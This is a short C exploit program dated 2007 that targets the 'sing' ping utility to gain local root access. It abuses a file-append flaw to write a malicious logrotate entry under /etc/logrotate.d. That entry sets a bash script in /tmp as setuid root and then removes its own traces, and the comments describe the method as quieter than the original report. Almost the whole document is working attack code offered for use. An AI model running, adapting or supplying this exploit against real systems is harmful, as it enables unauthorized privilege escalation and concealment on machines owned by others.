sendicmp-append.txt

`/*  
sing file append exploit  
by bannedit  
  
12/05/2007  
  
The original reporter of this issue included an example session which  
added an account to the machine.  
  
The method for this exploit is slightly different and much more  
quiet. Although it relies upon logrotate for help.  
  
This could easily be modified to work with cron daemons which  
are not too strict about the cron file format. However,  
when I tested vixie cron it appears that there are  
better checks for file format compilance these days.  
*/  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <unistd.h>  
  
#define SING_PATH "/usr/bin/sing"  
  
char *file = "/etc/logrotate.d/sing";  
char *evilname = "\n/tmp/sing {\n daily\n size=0\n firstaction\n chown root /tmp/shell; chmod 4755 /tmp/shell; rm -f /etc/logrotate.d/sing; rm -f /tmp/sing*\n endscript\n}\n\n\n";  
  
  
  
int main()  
{  
FILE *fp;  
int pid;  
  
puts("sing file append exploit");  
puts("------------------------");  
puts("by bannedit");  
  
if(fp = fopen("/tmp/shell", "w+"))  
{  
fputs("#!/bin/bash\n", fp);  
fputs("/bin/bash -p", fp);  
fclose(fp);  
system("touch /tmp/sing; echo garbage >> /tmp/sing");  
}  
else  
{  
puts("error making shell file");  
exit(-1);  
}  
  
sleep(5);  
printf("done sleeping...\n");  
execl(SING_PATH, evilname, "-Q", "-c", "1", "-L", file, "localhost", 0);  
return 0;  
}  
  
`